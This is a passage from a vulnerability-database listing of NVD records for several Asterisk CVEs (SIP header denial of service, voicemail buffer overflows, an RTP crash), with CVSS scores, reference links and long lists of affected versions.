              "matchCriteriaId": "5991814D-CA77-4C25-90D2-DB542B17E0AD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF47C9F0-D8DA-4B55-89EB-9B2C9383ADB9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.15 before 1.8.15-cert5 and 11.6 before 11.6-cert2, when chan_sip has a certain configuration, allows remote authenticated users to cause a denial of service (channel and file descriptor consumption) via an INVITE request with a (1) Session-Expires or (2) Min-SE header with a malformed or invalid value."
    },
    {
      "lang": "es",
      "value": "channels/chan_sip.c en Asterisk Open Source 1.8.x anterior a 1.8.26.1, 11.8.x anterior a 11.8.1 y 12.1.x anterior a 12.1.1, y Certified Asterisk 1.8.15 anterior a 1.8.15-cert5 y 11.6 anterior a 11.6-cert2, cuando chan_sip tiene cierta configuraci\u00f3n, permite a usuarios remotos autenticados causar una denegaci\u00f3n de servicio (consumo de canal y consumo de descriptores de archivo) a trav\u00e9s de una solicitud INVITE con una cabecera (1) Session-Expires o (2) Min-SE con un valor malformado o invalido."
    }
  ],
  "id": "CVE-2014-2287",
  "lastModified": "2024-11-21T02:06:00.530",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-04-18T22:14:38.010",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-002.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/66094"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23373"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/66094"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23373"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2007-10-12 23:17

Modified

2024-11-21 00:37

Severity ?

Summary

Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields. NOTE: vector 2 requires write access to Asterisk configuration files.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.digium.com/pub/security/AST-2007-022.html
	cve@mitre.org	http://osvdb.org/38201
	cve@mitre.org	http://osvdb.org/38202
	cve@mitre.org	http://secunia.com/advisories/27184
	cve@mitre.org	http://www.securityfocus.com/archive/1/481996/100/0/threaded
	cve@mitre.org	http://www.securityfocus.com/bid/26005
	cve@mitre.org	http://www.securitytracker.com/id?1018804
	cve@mitre.org	http://www.vupen.com/english/advisories/2007/3454
	cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/37051
	cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/37052
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2007-022.html
	af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/38201
	af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/38202
	af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/27184
	af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/481996/100/0/threaded
	af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/26005
	af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1018804
	af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/3454
	af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/37051
	af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/37052

Impacted products

	Vendor	Product	Version
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "600A8B6A-B929-455F-AB6C-548712F45A44",
              "versionEndIncluding": "1.4.12",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields.  NOTE: vector 2 requires write access to Asterisk configuration files."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples desbordamientos de b\u00fafer en la funcionalidad de voicemail del Asterisk 1.4.x anterior al 1.4.13, cuando se utiliza el almacenamiento IMAP, puede permitir (1) a atacantes ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una combinaci\u00f3n larga de cabeceras dependientes del tipo (Content-type) y de la descripci\u00f3n (Content-description), o (2) usuarios locales ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una combinaci\u00f3n larga de los campos astspooldir, voicemail context y voicemail mailbox. NOTA: el vector 2 requiere acceso de escritura en los ficheros de configuraci\u00f3n del Asterisk."
    }
  ],
  "id": "CVE-2007-5358",
  "lastModified": "2024-11-21T00:37:42.973",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-10-12T23:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/38201"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/38202"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/27184"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/26005"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018804"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/3454"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/38201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/38202"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/27184"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/26005"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018804"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/3454"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2009-12-02 11:30

Modified

2024-11-21 01:08

Severity ?

Summary

rtp.c in Asterisk Open Source 1.2.x before 1.2.37, 1.4.x before 1.4.27.1, 1.6.0.x before 1.6.0.19, and 1.6.1.x before 1.6.1.11; Business Edition B.x.x before B.2.5.13, C.2.x.x before C.2.4.6, and C.3.x.x before C.3.2.3; and s800i 1.3.x before 1.3.0.6 allows remote attackers to cause a denial of service (daemon crash) via an RTP comfort noise payload with a long data length.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt	Exploit
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt	Exploit
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt	Exploit
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt	Exploit
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2009-010.html	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/37530	Exploit, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/37677
cve@mitre.org	http://secunia.com/advisories/37708
cve@mitre.org	http://securitytracker.com/id?1023249
cve@mitre.org	http://www.debian.org/security/2009/dsa-1952
cve@mitre.org	http://www.osvdb.org/60569
cve@mitre.org	http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html
cve@mitre.org	http://www.securityfocus.com/archive/1/508147/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/37153
cve@mitre.org	http://www.vupen.com/english/advisories/2009/3368	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/54471
cve@mitre.org	https://issues.asterisk.org/view.php?id=16242
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2009-010.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37530	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37677
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/37708
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1023249
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2009/dsa-1952
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/60569
af854a3a-2127-422b-91ae-364da2661108	http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/508147/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/37153
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2009/3368	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/54471
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/view.php?id=16242

Impacted products

Vendor	Product	Version
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.1
digium	asterisk	1.2.2
digium	asterisk	1.2.2
digium	asterisk	1.2.3
digium	asterisk	1.2.3
digium	asterisk	1.2.10
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2.12
digium	asterisk	1.2.12.1
digium	asterisk	1.2.12.1
digium	asterisk	1.2.13
digium	asterisk	1.2.13
digium	asterisk	1.2.14
digium	asterisk	1.2.15
digium	asterisk	1.2.15
digium	asterisk	1.2.16
digium	asterisk	1.2.16
digium	asterisk	1.2.17
digium	asterisk	1.2.17
digium	asterisk	1.2.18
digium	asterisk	1.2.18
digium	asterisk	1.2.19
digium	asterisk	1.2.19
digium	asterisk	1.2.20
digium	asterisk	1.2.20
digium	asterisk	1.2.21
digium	asterisk	1.2.21
digium	asterisk	1.2.21.1
digium	asterisk	1.2.21.1
digium	asterisk	1.2.22
digium	asterisk	1.2.22
digium	asterisk	1.2.23
digium	asterisk	1.2.23
digium	asterisk	1.2.24
digium	asterisk	1.2.24
digium	asterisk	1.2.25
digium	asterisk	1.2.25
digium	asterisk	1.2.26
digium	asterisk	1.2.26
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.2
digium	asterisk	1.2.26.2
digium	asterisk	1.2.27
digium	asterisk	1.2.28
digium	asterisk	1.2.28.1
digium	asterisk	1.2.29
digium	asterisk	1.2.30
digium	asterisk	1.2.30.1
digium	asterisk	1.2.30.2
digium	asterisk	1.2.30.3
digium	asterisk	1.2.30.4
digium	asterisk	1.2.31
digium	asterisk	1.2.31.1
digium	asterisk	1.2.32
digium	asterisk	1.2.33
digium	asterisk	1.2.34
digium	asterisk	1.2.35
digium	asterisk	1.2.36
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0.1
digium	asterisk	1.6.0.2
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.4
digium	asterisk	1.6.0.5
digium	asterisk	1.6.0.6
digium	asterisk	1.6.0.7
digium	asterisk	1.6.0.8
digium	asterisk	1.6.0.9
digium	asterisk	1.6.0.10
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.15
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.18
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	s800i	1.3.0
digium	s800i	1.3.0.2
digium	s800i	1.3.0.3
digium	s800i	1.3.0.4
digium	asterisk	b
digium	asterisk	b.1.3.2
digium	asterisk	b.1.3.3
digium	asterisk	b.2.2.0
digium	asterisk	b.2.2.1
digium	asterisk	b.2.3.1
digium	asterisk	b.2.3.2
digium	asterisk	b.2.3.3
digium	asterisk	b.2.3.4
digium	asterisk	b.2.3.5
digium	asterisk	b.2.3.6
digium	asterisk	b.2.5.0
digium	asterisk	b.2.5.1
digium	asterisk	b.2.5.2
digium	asterisk	b.2.5.3
digium	asterisk	c
digium	asterisk	c.2.3
digium	asterisk	c.3.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "39358795-09A6-44C6-B969-1560CEF40057",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "8C2DAB51-91ED-43D4-AEA9-7C4661089BAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A596A018-2FBC-4CEB-9910-756CC6598679",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14BDCF8E-0B68-430A-A463-EE40C1A9AD65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CA2CD93E-71A5-49EC-B986-5868C05553EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B66B213-4397-4435-8E48-8ED69AAE13D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "55131A3D-C892-44EC-83D6-5888C57B11A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E017DD53-B8EC-4EA2-BF59-18C075C5771D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "B940EEC6-4451-42B9-A56D-BDB8801B3685",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "CE4AB19F-1338-466D-AAD8-584C79FED1AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "FF5A2AA3-BB1F-4DEA-A369-183877BBDAC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "7B43C508-91E3-49C9-86F0-3643D8F2B7F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0831E658-36AB-4A4B-9929-3DB6BE855A3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "69417F54-D92F-46FB-9BFA-995211279C0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "46A770C7-A7D4-44E3-A8B4-AC2189EAC3DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "4611BEA0-25EC-4705-A390-6DF678373FF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "4BCD1F97-4B56-4DA8-A6EC-FA42A3CB9B97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "53022458-F443-4402-AC52-FC3AE810E89E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "120B85AA-E9B8-4A4D-81CE-FD36CDB63074",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "64D94742-7CA1-487B-90E8-5063FBF88925",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "12302460-5D3F-4045-9DBF-606562E03BDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "78546FDF-C843-4E48-ABEE-CC3514AA7C3A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D6EBC0B-9842-44D1-B9D6-EFB88BE22879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "052969F1-6758-46E8-9273-E0F872BD65BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "624A0F00-4629-4550-847F-F24CC93DFF2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E473F645-F8B0-43FE-957B-F053427465DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "10FC9AAB-1FAD-4953-A2FC-D42E9687D27E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "460C9907-AA19-402A-85DE-D3CEA98B107B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD80F0D6-6B5B-41D3-AC41-F1643865088A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "734D5198-53C1-40D3-B5BF-D74FC71FD3BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "788DEF5E-8A99-463D-89DC-0CC032271554",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "C0996D7A-9419-4897-A0AF-498AC3A2A81F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "62D670E6-47E5-4B40-9217-F97D5F39C3EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "94C23DB8-3C92-40FE-B8A6-ADF84D28510E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6CE7E4E-DA2D-4F03-A226-92965B40AE34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0C59A947-457E-47EB-832E-3DA70CB52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "55F74B56-B412-4AF1-AED0-C948AB6DC829",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "3B50ADDB-D3C2-407D-8844-F93866E5F20C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "2775A7CC-2D88-4F2D-8C26-1E0DDDD681E9",
              "vulnerable": true
            },
            {
